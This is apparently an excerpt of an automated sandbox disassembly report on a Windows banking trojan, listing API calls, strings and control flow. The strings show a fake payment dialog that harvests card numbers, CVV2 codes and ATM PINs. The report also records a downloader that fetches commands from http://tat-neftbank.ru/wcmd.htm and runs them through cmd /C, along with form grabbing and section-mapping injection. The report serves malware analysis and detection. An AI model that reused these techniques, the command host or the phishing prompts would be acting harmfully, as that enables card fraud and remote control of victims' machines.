                            • GetWindowLongA.USER32(000000FC,00000030), ref: 0040666F
                            • SetWindowLongA.USER32(000000FC,004077E4,00000000), ref: 00406686
                            • GetWindowLongA.USER32(000000FC,00000001), ref: 00406699
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066B0
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066BD
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066D4
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066E1
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066F8
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406705
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 0040671C
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406732
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 00406749
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$CreateMessageSend$Long$Fontsprintf$ClassNameRectShow
                            • String ID: Authorization Failed.$%.2u$20%.2u$3-digit validation code on back of card (cvv2)$ATM PIN-Code$BUTTON$COMBOBOX$Card && expiration date$Click Once To Continue$DocObject$EDIT$Explorer$MasterCard$Please make corrections and try again.$QueenKarton$STATIC$Unable to authorize. ATM PIN-Code is required to complete the transaction.$Visa$Your card number
                            • API String ID: 1504929638-2953596215
                            • Opcode ID: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction ID: 07d4a47d2009414dc6278682baa0b56b1decc7bc7d2f3e077783c243e1dcc7f7
                            • Opcode Fuzzy Hash: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction Fuzzy Hash: 43F16F31BC43157AFA212B61ED43FA93A66AF14F44F60413AB700BD0F1DAF92911AB5D
                            Function 0040570C Relevance: 122.9, APIs: 56, Strings: 14, Instructions: 371stringfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 310 40570c-405743 call 4079e4 GetTempPathA 313 405746-40574b 310->313 313->313 314 40574d-405796 call 4015ea strcat sprintf rand 313->314 317 405798-4057a9 strcat 314->317 318 4057ac-4057bc rand 314->318 317->318 319 4057e7-4057f7 rand 318->319 320 4057be-4057e4 rand sprintf 318->320 321 4057f9-40580a strcat 319->321 322 40580d-405837 strcat rand 319->322 320->319 321->322 323 405839-40584a strcat 322->323 324 40584d-40585d rand 322->324 323->324 325 405888-4058c1 sprintf rand 324->325 326 40585f-405885 rand sprintf 324->326 327 4058c3-4058d4 strcat 325->327 328 4058d7-4058fb strcat rand 325->328 326->325 327->328 329 405911-40593b strcat rand 328->329 330 4058fd-40590e strcat 328->330 331 405966-40598a strcat rand 329->331 332 40593d-405963 rand sprintf 329->332 330->329 333 4059a0-4059d0 strcat rand 331->333 334 40598c-40599d strcat 331->334 332->331 335 4059d2-4059e3 strcat 333->335 336 4059e6-405a0a strcat rand 333->336 334->333 335->336 337 405a20-405a5a sprintf rand 336->337 338 405a0c-405a1d strcat 336->338 339 405a70-405a9a strcat rand 337->339 340 405a5c-405a6d strcat 337->340 338->337 341 405ab0-405af1 rand sprintf rand 339->341 342 405a9c-405aad strcat 339->342 340->339 343 405af3-405b04 strcat 341->343 344 405b07-405b37 strcat rand 341->344 342->341 343->344 345 405b39-405b4a strcat 344->345 346 405b4d-405b5d rand 344->346 345->346 347 405b88-405c08 strcat CreateFileA lstrlenA WriteFile CloseHandle 346->347 348 405b5f-405b85 rand sprintf 346->348 348->347
                            APIs
                            • GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                            • strcat.CRTDLL(?,.htm), ref: 00405764
                            • sprintf.CRTDLL(?,<html>), ref: 00405778
                            • rand.CRTDLL ref: 00405786
                            • strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                            • rand.CRTDLL ref: 004057AC
                            • rand.CRTDLL ref: 004057BE
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                            • rand.CRTDLL ref: 004057E7
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405805
                            • strcat.CRTDLL(?,<head>), ref: 00405819
                            • rand.CRTDLL ref: 00405827
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405845
                            • rand.CRTDLL ref: 0040584D
                            • rand.CRTDLL ref: 0040585F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405880
                            • sprintf.CRTDLL(?,%s<title>%s%u</title>,?,MicroSoft-Corp,?), ref: 004058A3
                            • rand.CRTDLL ref: 004058B1
                            • strcat.CRTDLL(?,0042CC6C), ref: 004058CF
                            • strcat.CRTDLL(?,</head>), ref: 004058E3
                            • rand.CRTDLL ref: 004058EB
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405909
                            • strcat.CRTDLL(?,<body>), ref: 0040591D
                            • rand.CRTDLL ref: 0040592B
                            • rand.CRTDLL ref: 0040593D
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 0040595E
                            • strcat.CRTDLL(?,<script>), ref: 00405972
                            • rand.CRTDLL ref: 0040597A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405998
                            • strcat.CRTDLL(?,function x()), ref: 004059AC
                            • rand.CRTDLL ref: 004059C0
                            • strcat.CRTDLL(?,0042CC6C), ref: 004059DE
                            • strcat.CRTDLL(?,0042CA2E), ref: 004059F2
                            • rand.CRTDLL ref: 004059FA
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A18
                            • sprintf.CRTDLL(?,%sself.parent.location="%s";,?,?), ref: 00405A42
                            • rand.CRTDLL ref: 00405A4A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A68
                            • strcat.CRTDLL(?,0042CA14), ref: 00405A7C
                            • rand.CRTDLL ref: 00405A8A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AA8
                            • rand.CRTDLL ref: 00405AB0
                            • sprintf.CRTDLL(?,%ssetTimeout("x()",%u);,?), ref: 00405AD9
                            • rand.CRTDLL ref: 00405AE1
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AFF
                            • strcat.CRTDLL(?,</script>), ref: 00405B13
                            • rand.CRTDLL ref: 00405B27
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405B45
                            • rand.CRTDLL ref: 00405B4D
                            • rand.CRTDLL ref: 00405B5F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405B80
                            • strcat.CRTDLL(?,</body><html>), ref: 00405B94
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BAC
                            • lstrlenA.KERNEL32(?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BCD
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BE9
                            • CloseHandle.KERNEL32(?,?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$sprintf$File$CloseCreateHandlePathTempWritelstrlen
                            • String ID: %s<!-- %u -->$%s<title>%s%u</title>$%sself.parent.location="%s";$%ssetTimeout("x()",%u);$.htm$</body><html>$</head>$</script>$<body>$<head>$<html>$<script>$MicroSoft-Corp$function x()
                            • API String ID: 4291226702-3565490566
                            • Opcode ID: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction ID: 1c5cdfde58a584b0b9fe07ae47c92bc765a9e47636cc13cf9b12a0be20bdf5ec
                            • Opcode Fuzzy Hash: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction Fuzzy Hash: 93B1CAB6F0132416EB14A262DCC6B6D31AA9B85704F6404FFF508731C2E67C6E558AFE
                            Function 004068B0 Relevance: 61.5, APIs: 22, Strings: 13, Instructions: 221stringprocessfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 382 4068b0-4068c1 383 4068c7-4068e1 call 405f5b 382->383 386 4068e7-40690f call 403619 383->386 387 406c0c-406c1d _sleep 383->387 390 406be1-406bfb call 4043bf 386->390 391 406915 386->391 387->383 394 406c01-406c07 LocalFree 390->394 395 40691a-406921 390->395 391->387 394->387 395->390 396 406927-40692e 395->396 397 406934-40693b 396->397 398 406a66-406a7e call 40143b 396->398 397->398 400 406941-406970 sscanf 397->400 398->390 406 406a84-406aa7 atoi 398->406 402 406972-406995 rand 400->402 403 40699b-4069a2 400->403 402->390 402->403 404 4069a4-4069d9 sprintf * 2 403->404 405 4069db-406a24 GetWindowsDirectoryA sprintf strcat 403->405 407 406a27-406a61 DeleteFileA sprintf WinExec 404->407 405->407 406->390 408 406aad-406aef sprintf call 407a04 lstrlenA 406->408 407->398 411 406b17-406b1e 408->411 412 406b20-406bdc sprintf lstrlenA * 2 LocalAlloc call 407a04 lstrlenA call 407a04 CreateThread CloseHandle 411->412 413 406af1-406aff 411->413 412->390 414 406b11 413->414 415 406b01-406b0f 413->415 414->411 415->412
                            APIs
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?), ref: 00405F73
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,?), ref: 00405F7E
                              • Part of subcall function 00405F5B: LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                              • Part of subcall function 00405F5B: DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                              • Part of subcall function 00405F5B: CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                              • Part of subcall function 00405F5B: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                              • Part of subcall function 00405F5B: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                              • Part of subcall function 00405F5B: CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            • sscanf.CRTDLL(0000003A,:%02u,?), ref: 0040695B
                            • rand.CRTDLL ref: 00406972
                            • sprintf.CRTDLL(?,%s\cmd.pif,00429080), ref: 004069B5
                            • sprintf.CRTDLL(?,%s\cmd.exe,00429080,?,%s\cmd.pif,00429080), ref: 004069D1
                            • GetWindowsDirectoryA.KERNEL32(?,00000400), ref: 004069E7
                            • sprintf.CRTDLL(?,%s\command.pif,?,?,00000400), ref: 00406A0E
                            • strcat.CRTDLL(?,\command.com,?,%s\command.pif,?,?,00000400), ref: 00406A1F
                            • DeleteFileA.KERNEL32(?,?,?,?,?,00000400), ref: 00406A2E
                            • sprintf.CRTDLL(?,%s /C %s,?,00000036,?,?,?,?,?,00000400), ref: 00406A50
                            • WinExec.KERNEL32(?,00000000), ref: 00406A61
                            • atoi.CRTDLL(00000035), ref: 00406A8E
                            • sprintf.CRTDLL(?,%s\Rtdx1%i.dat,00429080,0000000C), ref: 00406AC4
                            • lstrlenA.KERNEL32(?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406AE4
                            • sprintf.CRTDLL(0000002F,%s/Rtdx1%i.htm,0000002F,0000000C,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B45
                            • lstrlenA.KERNEL32(?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B54
                            • lstrlenA.KERNEL32(0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B66
                            • LocalAlloc.KERNEL32(00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B78
                            • lstrlenA.KERNEL32(?,?,?,00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406BA2
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000686C,?,00000000,0000000C), ref: 00406BD6
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,Function_0000686C,?,00000000,0000000C,?,0000002F,?,?,?,00000040,?,0000002F,?), ref: 00406BDC
                            • LocalFree.KERNEL32(?,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406C07
                            • _sleep.CRTDLL(001B7740), ref: 00406C17
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$sprintf$LocalThread$AllocCloseCreateDeleteHandle$CacheCodeDirectoryEntryExecExitFileFreeObjectSingleWaitWindows_sleepatoirandsscanfstrcat
                            • String ID: %s /C %s$%s/Rtdx1%i.htm$%s\Rtdx1%i.dat$%s\cmd.exe$%s\cmd.pif$%s\command.pif$/$:$:$:%02u$\command.com$http://tat-neftbank.ru/wcmd.htm$wupd
                            • API String ID: 4275340860-3363018154
                            • Opcode ID: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction ID: 18f08bfc30c9890c11dd244c38850a50baba5aa484248b9ca7ce56826a71177a
                            • Opcode Fuzzy Hash: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction Fuzzy Hash: 328163B1E08228ABDB21A6658D46BD977BCDB04304F5105F7E60CB21C1E67C7F948F99
                            Function 004052E0 Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 115sleepstringprocessCOMMON
                            Download Yara Rule
                            APIs
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052F8
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?), ref: 0040530B
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?), ref: 0040532C
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040539F
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053B2
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053D4
                            • Sleep.KERNEL32(00007800,00000000,00000000,00000044,?), ref: 00405426
                            • Sleep.KERNEL32(0000F000,00007800,00000000,00000000,00000044,?), ref: 00405439
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405451
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405499
                            • LocalFree.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054A5
                            • TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054B2
                            • CloseHandle.KERNEL32(?,?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessSleepThreadstrcat$CreateCurrentDeleteDesktopFileFreeLocalTerminateTextWindowmemsetsprintf
                            • String ID: %s%u - Microsoft Internet Explorer$D$MicroSoft-Corp$X-okRecv11$\Iexplore.exe
                            • API String ID: 1202517094-2261298365
                            • Opcode ID: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction ID: a5954b523feb805065d44168e487e19d6cbd8b1c6e851fe6a795fce517e83f05
                            • Opcode Fuzzy Hash: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction Fuzzy Hash: 4F416572E442186ADB20AA65CC46BDDB3B99F50305F1444F7E208F61D1DABCAEC48F59
                            Function 00401B9F Relevance: 26.7, APIs: 11, Strings: 4, Instructions: 487memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SysAllocString.OLEAUT32(value), ref: 00401BCC
                              • Part of subcall function 004017AC: CoInitialize.OLE32(00000000), ref: 004017CC
                              • Part of subcall function 004017AC: CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                              • Part of subcall function 004017AC: CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            • _sleep.CRTDLL(00000000), ref: 00401BFD
                            • GetForegroundWindow.USER32(00000000), ref: 00401C02
                              • Part of subcall function 0040185F: GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • memcpy.CRTDLL(00418F40,?,?), ref: 00401D6D
                            • memcpy.CRTDLL(?,00418F40,?), ref: 00401F34
                            • _sleep.CRTDLL(00000000), ref: 00401F4A
                            • sprintf.CRTDLL(?,%s FORM_%X,?,?,00000000), ref: 00401F77
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: StringWindow_sleepmemcpy$AllocCreateForegroundFromInitializeInstanceTextsprintf
                            • String ID: %s %X%c$%s FORM_%X$%s%c$value
                            • API String ID: 3510745994-3693252589
                            • Opcode ID: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction ID: 207a0c2c24704257dc82047f11ad41d7b25eba1db427a6dda8aff0efe7f4a5ef
                            • Opcode Fuzzy Hash: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction Fuzzy Hash: 2112DC71A002199FDB62DB68CD44BDAB7F9BB0C304F5040FAA588E7290D7B4AAC58F55
                            Function 00402822 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 34libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                            • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                            • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                            • GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: NtMapViewOfSection$NtOpenSection$NtUnmapViewOfSection$RtlInitUnicodeString$RtlNtStatusToDosError$ntdll.dll
                            • API String ID: 667068680-1987783197
                            • Opcode ID: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction ID: 9d3c92be313ac2760b75685e9acc68d9338f811418752029c31410863af0f615
                            • Opcode Fuzzy Hash: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction Fuzzy Hash: BCF03A21B642206B93126B327D4293E36689792B19395003FF840F6191DB7C09225F9F
                            Function 00402E06 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 337libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00402822: GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            • GetVersion.KERNEL32 ref: 00402E22
                            • LoadLibraryA.KERNEL32 ref: 00402E91
                            • GetProcAddress.KERNEL32 ref: 00402EC5
                            • IsBadReadPtr.KERNEL32(?,00001000), ref: 00402F75
                            • GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                            • CloseHandle.KERNEL32(?), ref: 00403065
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004030EA
                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040315B
                            • IsBadWritePtr.KERNEL32(00000000,00001000), ref: 004031F1
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Handle$Module$CloseGlobalLibraryLoadMemoryQueryReadStatusVersionVirtualWrite
                            • String ID: kernel32.dll
                            • API String ID: 2089743848-1793498882
                            • Opcode ID: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction ID: cfd5926590b061e949c3a24607155209ead47d6dc4f6dfca132d0ef3b1a5cdf0
                            • Opcode Fuzzy Hash: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction Fuzzy Hash: F6F19070D042B88BEB328F64DD483E9BBB1AB55306F0481EBD588662D2C2B85FC5CF55
                            Function 004037AA Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 53COMMON
                            Download Yara Rule
                            APIs
                            • printf.CRTDLL([length=%i] [summ=%i],?,00000000), ref: 004037DD
                            • printf.CRTDLL(HEX: ,[length=%i] [summ=%i],?,00000000), ref: 004037EE
                            • printf.CRTDLL(%02X ,00000000), ref: 00403804
                            • printf.CRTDLL(TXT: '%s',?), ref: 0040382C
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: TXT: '%s'$%02X $HEX: $X4$[length=%i] [summ=%i]
                            • API String ID: 3524737521-4004101572
                            • Opcode ID: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction ID: a8ef6db4a05ad48ab0456940bf437e850f92713de92630681f76b68ebadef0f7
                            • Opcode Fuzzy Hash: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
